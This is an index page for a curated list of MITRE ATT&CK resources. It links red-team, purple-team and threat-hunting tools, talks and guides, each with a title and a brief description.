Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
awesome-mitre-attack
A curated list of awesome resources related to Mitre ATT&CK™ Framework
https://github.com/infosecn1nja/awesome-mitre-attack
Last synced: 5 days ago
JSON representation
-
Red and Purple Team
-
Tools
- Empire - Post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent.
- Invoke-PSImage - Invoke-PSImage takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image.
- RE:TERNAL - RE:TERNAL is a centralised purple team simulation platform. Reternal uses agents installed on a simulation network to execute various known red-teaming techniques in order to test blue-teaming capabilities.
- VECTR - VECTR is a tool that facilitates tracking of your red and blue team testing activities to measure detection and prevention capabilities across different attack scenarios
- MITRE CALDERA - CALDERA is an automated adversary emulation system, built on the MITRE ATT&CK™ framework.
- Atomic Red Team - Small and highly portable detection tests based on MITRE's ATT&CK.
- Metta - An information security preparedness tool to do adversarial simulation.
- Red Team Automation (RTA) - RTA provides a framework of scripts designed to allow blue teams to test their detection capabilities against malicious tradecraft, modeled after MITRE ATT&CK.
- Cobalt Strike - Software for Adversary Simulations and Red Team Operations
- Purple Team ATT&CK Automation - Praetorian's public release of our Metasploit automation of MITRE ATT&CK™ TTPs
-
Resources
- MITRE ATT&CK™ Evaluations Round 1 - APT3
- Getting Started with ATT&CK: Adversary Emulation and Red Teaming
- Live Adversary Simulation: Red and Blue Team Tactics
- PowerShell for Practical Purple Teaming
- Signal the ATT&CK: Part 2
- Adversary Emulation Plans
- Why we love threat emulation exercises (and how to get started with one of your own)
- MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary to Create Better Detections, David Herrald and Ryan Kovar, Splunk
- Living Off The Land Binaries and Scripts (and also Libraries)
- Purple Teaming with Vectr, Cobalt Strike, and MITRE ATT&CK
- Red Team Use of MITRE ATT&CK
- Purple Teaming with ATT&CK - x33fcon 2018
- MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with ATT&CK, David Middlehurst, Trustwave
- MITRE ATT&CKcon 2018: From Red VS Blue to Red ♥ Blue, Olaf Hartong and Vincent Van Mieghem, Deloitte
- Signal the ATT&CK: Part 2
- Red Team Use of MITRE ATT&CK
- Signal the ATT&CK: Part 1
-
-
Threat Hunting
-
Resources
- MITRE ATT&CK Windows Logging Cheat Sheets
- osquery-attck - Mapping the MITRE ATT&CK Matrix with Osquery
- ATTACKdatamap - A datasource assessment on an event level to show potential coverage or the MITRE ATT&CK framework
- Splunk Mitre ATT&CK App - A Splunk app mapped to MITRE ATT&CK to guide your threat hunts
- HELK - A Hunting ELK (Elasticsearch, Logstash, Kibana) with advanced analytic capabilities.
- atomic-threat-coverage - Automatically generated actionable analytics designed to combat threats based on MITRE's ATT&CK.
- Wayfinder - Artificial Intelligence Agent to extract threat intelligence TTPs from feeds of malicious and benign event sources and automate threat hunting activities.
- pyattck - A python package to interact with the Mitre ATT&CK Framework. You can find documentation [here](https://pyattck.readthedocs.io/en/latest/)
- MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, SpecterOps and Jose Luis Rodriguez, Student
- Testing the Top MITRE ATT&CK Techniques: PowerShell, Scripting, Regsvr32
- Ten Ways Zeek Can Help You Detect the TTPs of MITRE ATT&CK
- SEC1244 - Cops and Robbers: Simulating the Adversary to Test Your Splunk Security Analytics
- Post-Exploitation Hunting with ATT&CK & Elastic
- How MITRE ATT&CK helps security operations
- MITRE Cyber Analytics Repository
- Defensive Gap Assessment with MITRE ATT&CK
- Finding Related ATT&CK Techniques
- Getting Started with ATT&CK: Detection and Analytics
- 2019 Threat Detection Report
- A Process is No One : Hunting for Token Manipulation
- auditd-attack - A Linux Auditd rule set mapped to MITRE's Attack Framework
- CyberMenace - A one stop shop hunting app in Splunk that can ingest Zeek, Suricata, Sysmon, and Windows event data to find malicious indicators of compromise relating to the MITRE ATT&CK Matrix.
- Mapping your Blue Team to MITRE ATT&CK™
- Quantify Your Hunt: Not Your Parent’s Red Teaming Redux
- ThreatHunter-Playbook
- Prioritizing the Remediation of Mitre ATT&CK Framework Gaps
- Ten Ways Zeek Can Help You Detect the TTPs of MITRE ATT&CK
-
-
Threat Intelligence
-
Tools
-
Resources
-
-
Community
Programming Languages
Sub Categories
Keywords
mitre-attack
4
threat-hunting
3
stix
2
dfir
2
siem
2
mitre
2
virtualbox
1
vagrant
1
uber
1
simulation
1
security
1
redis
1
python
1
networking
1
network
1
infosec
1
celery
1
adversarial
1
security-testing
1
security-automation
1
red-team
1
mitre-corporation
1
hacking
1
cybersecurity
1
caldera
1
taxii
1
sigma
1
cyber-threat-intelligence
1
cti
1
attack
1
spark
1
logstash
1
kibana
1
jupyter-notebook
1
hunting-platforms
1
hunting
1
elk-stack
1
elk
1
elasticsearch
1
elastic
1
dockerhub
1
docker
1
splunk
1
threat-detection
1
yaml
1
adversary-emulation
1